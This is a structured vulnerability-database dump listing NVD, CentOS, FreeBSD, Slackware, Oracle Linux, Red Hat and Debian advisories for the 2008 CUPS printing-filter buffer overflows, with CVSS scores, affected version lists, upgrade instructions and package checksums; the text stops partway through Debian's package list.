"cpe:2.3:a:apple:cups:1.1.22:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:b1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.23:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc4:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.10-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:15", "description": "Heap-based buffer overflow in the read_rle16 function in imagetops in CUPS before 1.3.9 allows remote attackers to execute arbitrary code via an SGI image with malformed Run Length Encoded (RLE) data containing a small image and a large row count.", "edition": 6, "cvss3": {}, "published": "2008-10-14T21:10:00", "title": "CVE-2008-3639", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3639"], "modified": "2018-10-03T21:55:00", "cpe": ["cpe:/a:apple:cups:1.2.7", "cpe:/a:apple:cups:1.2.5", "cpe:/a:apple:cups:1.2.8", "cpe:/a:apple:cups:1.3.5", "cpe:/a:apple:cups:1.1.6-3", "cpe:/a:apple:cups:1.1.16", "cpe:/a:apple:cups:1.1.12", "cpe:/a:apple:cups:1.2", "cpe:/a:apple:cups:1.1.5-2", "cpe:/a:apple:cups:1.3.8", "cpe:/a:apple:cups:1.1.11", "cpe:/a:apple:cups:1.1.21", "cpe:/a:apple:cups:1.1.6-1", "cpe:/a:apple:cups:1.3.1", "cpe:/a:apple:cups:1.1.3", "cpe:/a:apple:cups:1.1.2", "cpe:/a:apple:cups:1.1.1", "cpe:/a:apple:cups:1.3", "cpe:/a:apple:cups:1.1.5", "cpe:/a:apple:cups:1.1", "cpe:/a:apple:cups:1.2.2", "cpe:/a:apple:cups:1.2.1", "cpe:/a:apple:cups:1.2.12", "cpe:/a:apple:cups:1.1.10-1", "cpe:/a:apple:cups:1.2.9", "cpe:/a:apple:cups:1.1.17", "cpe:/a:apple:cups:1.1.9", "cpe:/a:apple:cups:1.2.6", "cpe:/a:apple:cups:1.1.6", "cpe:/a:apple:cups:1.1.19", "cpe:/a:apple:cups:1.1.9-1", "cpe:/a:apple:cups:1.1.20", "cpe:/a:apple:cups:1.3.3", "cpe:/a:apple:cups:1.1.23", "cpe:/a:apple:cups:1.2.10", "cpe:/a:apple:cups:1.3.2", "cpe:/a:apple:cups:1.3.4", "cpe:/a:apple:cups:1.1.8", "cpe:/a:apple:cups:1.3.7", "cpe:/a:apple:cups:1.1.18", "cpe:/a:apple:cups:1.1.6-2", "cpe:/a:apple:cups:1.2.3", "cpe:/a:apple:cups:1.3.0", "cpe:/a:apple:cups:1.1.15", "cpe:/a:apple:cups:1.1.13", "cpe:/a:apple:cups:1.1.5-1", "cpe:/a:apple:cups:1.1.22", "cpe:/a:apple:cups:1.2.4", "cpe:/a:apple:cups:1.1.10", "cpe:/a:apple:cups:1.2.11", "cpe:/a:apple:cups:1.2.0", "cpe:/a:apple:cups:1.3.6", "cpe:/a:apple:cups:1.1.7", "cpe:/a:apple:cups:1.1.4", "cpe:/a:apple:cups:1.1.14"], "id": "CVE-2008-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3639", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:cups:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.9-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:b1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc4:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc5:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc6:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc5:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5-2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:b2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:b1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.23:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc4:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.10-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.1:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2020-07-17T03:29:42", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0937\n\n\nThe Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX(R) operating systems.\n\nA buffer overflow flaw was discovered in the SGI image format decoding\nroutines used by the CUPS image converting filter \"imagetops\". An attacker\ncould create a malicious SGI image file that could, possibly, execute\narbitrary code as the \"lp\" user if the file was printed. (CVE-2008-3639)\n\nAn integer overflow flaw leading to a heap buffer overflow was discovered\nin the Text-to-PostScript \"texttops\" filter. An attacker could create a\nmalicious text file that could, possibly, execute arbitrary code as the\n\"lp\" user if the file was printed. (CVE-2008-3640)\n\nAn insufficient buffer bounds checking flaw was discovered in the\nHP-GL/2-to-PostScript \"hpgltops\" filter. An attacker could create a\nmalicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n\"lp\" user if the file was printed. (CVE-2008-3641)\n\nRed Hat would like to thank regenrecht for reporting these issues.\n\nAll CUPS users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027350.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027351.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027352.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027353.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027354.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027355.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027362.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027363.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027368.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/027369.html\n\n**Affected packages:**\ncups\ncups-devel\ncups-libs\ncups-lpd\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0937.html", "edition": 6, "modified": "2008-10-20T14:29:25", "published": "2008-10-10T08:49:24", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/027350.html", "id": "CESA-2008:0937", "title": "cups security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:23:54", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0577", "CVE-2008-3640"], "description": "**CentOS Errata and Security Advisory** CESA-2009:0308\n\n\nThe Common UNIX\u00ae Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nThe CUPS security advisory, RHSA-2008:0937, stated that it fixed\nCVE-2008-3640 for Red Hat Enterprise Linux 3, 4, and 5. It was discovered\nthis flaw was not properly fixed on Red Hat Enterprise Linux 3, however.\n(CVE-2009-0577)\n\nThese new packages contain a proper fix for CVE-2008-3640 on Red Hat\nEnterprise Linux 3. Red Hat Enterprise Linux 4 and 5 already contain the\nappropriate fix for this flaw and do not need to be updated.\n\nUsers of cups should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-February/027679.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-February/027681.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-February/027685.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-February/027686.html\n\n**Affected packages:**\ncups\ncups-devel\ncups-libs\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0308.html", "edition": 4, "modified": "2009-02-19T21:45:21", "published": "2009-02-19T18:19:28", "href": "http://lists.centos.org/pipermail/centos-announce/2009-February/027679.html", "id": "CESA-2009:0308", "title": "cups security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "\nThe release note of cups 1.3.9 reports:\n\nIt contains the following fixes:\n\nSECURITY: The HP-GL/2 filter did not range check\n\t pen numbers (STR #2911)\nSECURITY: The SGI image file reader did not range\n\t check 16-bit run lengths (STR #2918)\nSECURITY: The text filter did not range check cpi,\n\t lpi, or column values (STR #2919)\n\n\nExploitation of this vulnerability results in the execution\n\t of arbitrary code with the privileges of the affected service.\n", "edition": 4, "modified": "2008-10-09T00:00:00", "published": "2008-10-09T00:00:00", "id": "CE29CE1D-971A-11DD-AB7E-001C2514716C", "href": "https://vuxml.freebsd.org/freebsd/ce29ce1d-971a-11dd-ab7e-001c2514716c.html", "title": "cups -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:35:54", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641"], "description": "New cups packages are available for Slackware 12.0, 12.1, and -current to\nfix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3639\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3640\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3641\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\nFri Nov 7 22:23:40 CST 2008\npatches/packages/cups-1.3.9-i486-1_slack12.1.tgz: Upgraded to cups-1.3.9.\n This update fixes three vulnerabilities in the SGI image format filter, the\n texttops filter, and the HP-GL and HP-GL/2 plotter format filter. All three\n of these could result in a denial of service, and the plotter filter issue\n could possibly be used to execute code as the print spooler user.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3639\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3640\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3641\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/cups-1.3.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/cups-1.3.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/cups-1.3.9-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n26ebf49b262c56e192eaffe3e13a4bab cups-1.3.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n83cbf4c736362d5e9864f8694082500f cups-1.3.9-i486-1_slack12.1.tgz\n\nSlackware -current package:\n17130c48a822d3c0310a6ad3df138521 cups-1.3.9-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg cups-1.3.9-i486-1_slack12.1.tgz\n\nIf the machine is running the CUPS server, restart it:\n\n > sh /etc/rc.d/rc.cups restart", "modified": "2008-11-08T23:38:23", "published": "2008-11-08T23:38:23", "id": "SSA-2008-312-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.406571", "type": "slackware", "title": "[slackware-security] cups", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "[1.2.4-11.18:.2]\n- Applied patch to fix CVE-2008-3639 (STR #2918, bug #464721).\n- Applied patch to fix CVE-2008-3640 (STR #2919, bug #464721).\n- Applied patch to fix CVE-2008-3641 (STR #2911, bug #464721).", "edition": 4, "modified": "2008-10-10T00:00:00", "published": "2008-10-10T00:00:00", "id": "ELSA-2008-0937", "href": "http://linux.oracle.com/errata/ELSA-2008-0937.html", "title": "cups security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3640"], "description": "[1.1.17-13.3.56]\n- Applied patch to fix CVE-2008-3640 (STR #2919, bug #486052), which\n was not fixed in previous attempt.", "edition": 4, "modified": "2009-02-19T00:00:00", "published": "2009-02-19T00:00:00", "id": "ELSA-2009-0308", "href": "http://linux.oracle.com/errata/ELSA-2009-0308.html", "title": "cups security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:10", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641"], "description": "The Common UNIX Printing System (CUPS) provides a portable printing layer\nfor UNIX(R) operating systems.\n\nA buffer overflow flaw was discovered in the SGI image format decoding\nroutines used by the CUPS image converting filter \"imagetops\". An attacker\ncould create a malicious SGI image file that could, possibly, execute\narbitrary code as the \"lp\" user if the file was printed. (CVE-2008-3639)\n\nAn integer overflow flaw leading to a heap buffer overflow was discovered\nin the Text-to-PostScript \"texttops\" filter. An attacker could create a\nmalicious text file that could, possibly, execute arbitrary code as the\n\"lp\" user if the file was printed. (CVE-2008-3640)\n\nAn insufficient buffer bounds checking flaw was discovered in the\nHP-GL/2-to-PostScript \"hpgltops\" filter. An attacker could create a\nmalicious HP-GL/2 file that could, possibly, execute arbitrary code as the\n\"lp\" user if the file was printed. (CVE-2008-3641)\n\nRed Hat would like to thank regenrecht for reporting these issues.\n\nAll CUPS users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues.", "modified": "2017-09-08T11:50:25", "published": "2008-10-10T04:00:00", "id": "RHSA-2008:0937", "href": "https://access.redhat.com/errata/RHSA-2008:0937", "type": "redhat", "title": "(RHSA-2008:0937) Important: cups security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:13", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3640", "CVE-2009-0577"], "description": "The Common UNIX\u00ae Printing System (CUPS) provides a portable printing layer\nfor UNIX operating systems.\n\nThe CUPS security advisory, RHSA-2008:0937, stated that it fixed\nCVE-2008-3640 for Red Hat Enterprise Linux 3, 4, and 5. It was discovered\nthis flaw was not properly fixed on Red Hat Enterprise Linux 3, however.\n(CVE-2009-0577)\n\nThese new packages contain a proper fix for CVE-2008-3640 on Red Hat\nEnterprise Linux 3. Red Hat Enterprise Linux 4 and 5 already contain the\nappropriate fix for this flaw and do not need to be updated.\n\nUsers of cups should upgrade to these updated packages, which contain a\nbackported patch to correct this issue.", "modified": "2018-05-26T04:26:17", "published": "2009-02-19T05:00:00", "id": "RHSA-2009:0308", "href": "https://access.redhat.com/errata/RHSA-2009:0308", "type": "redhat", "title": "(RHSA-2009:0308) Important: cups security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:24:09", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1656-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 20, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : cupsys\nVulnerability : several\nProblem type : local(remote)\nDebian-specific: no\nCVE Id(s) : CVE-2008-3639 CVE-2008-3640 CVE-2008-3641\n\nSeveral local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3639\n\n It was discovered that insufficient bounds checking in the SGI\n image filter may lead to the execution of arbitrary code.\n\nCVE-2008-3640\n\n It was discovered that an integer overflow in the Postscript\n conversion tool "texttops" may lead to the execution of arbitrary\n code.\n\nCVE-2008-3641\n\n It was discovered that insufficient bounds checking in the HPGL\n filter may lead to the execution of arbitrary code.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.2.7-4etch5.\n\nFor the unstable distribution (sid) and the upcoming stable distribution\n(lenny), these problems have been fixed in version 1.3.8-1lenny2 of\nthe source package cups.\n\nWe recommend that you upgrade your cupsys package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz\n Size/MD5 checksum: 4214272 c9ba33356e5bb93efbcf77b6e142e498\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5.diff.gz\n Size/MD5 checksum: 108662 eab5aa097eaf3e802b4c6f1c60da9a03\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5.dsc\n Size/MD5 checksum: 1084 5fc7ea9d5c6434a9f2a45e3d7652b0fe\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch5_all.deb\n Size/MD5 checksum: 893832 0e7571a4a56cef8f099ba9300ed7330d\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch5_all.deb\n Size/MD5 checksum: 46072 63a75f9fe31312a42725a786164f7762\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 39310 8dad5588b86a4e1191025015d8e0c5be\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 1092376 35c1cd14d3f26fefafbebf1a76983740\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 85906 1d07dcf128e7b78992560b2794be29d4\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 183726 06377f48f1ee358c494f30f9ab213e6b\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 1614540 e87b439635e9b7f7c1fa1c6db2f7291c\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 95570 8638b199a8adb989254cbe88ab11bb7d\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 175262 08dbbe7e941af9c28f39107f907c618a\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_alpha.deb\n Size/MD5 checksum: 72690 1c099120f9fdcb334d8699b6238c0883\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 142538 4f9183a690ac21a220771db117b1bcea\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 162520 f04bafe61b0e06d21b67441916a4df2a\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 36356 eea9b0c14ac248313264474f4a103478\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 53022 f864e06d82bd0769e7c73d20aa6c3366\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 80708 9e8a7d08f6762753005bc2ac7ac04db7\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 86264 3784680669a08745d6c766213e3d60f3\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 1576062 c5f275763d3cd0bec5e448965780ea0b\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_amd64.deb\n Size/MD5 checksum: 1088040 106654a5c5a746e5bd1043ca4309deae\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 132042 b1da3e68e04c68712a7f2ecebbea59d3\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 1026238 e776ce47912d97de7758029cddf18c41\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 155174 2203ae0043e540bb4c083c3f302294a9\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 78908 a60d8486ab41fe7064d84fdf1c057ce5\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 48742 9c6f61fb9c5af3f1496c249eb79542ce\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 1569620 943fdc257cdf387c1a161adff88623bd\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 85468 3e9d699071d741d86c5e2fbcc91a5241\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch5_arm.deb\n Size/MD5 checksum: 35940 0bb609f5c990c932c0fed843bb659062\n\nhppa architecture 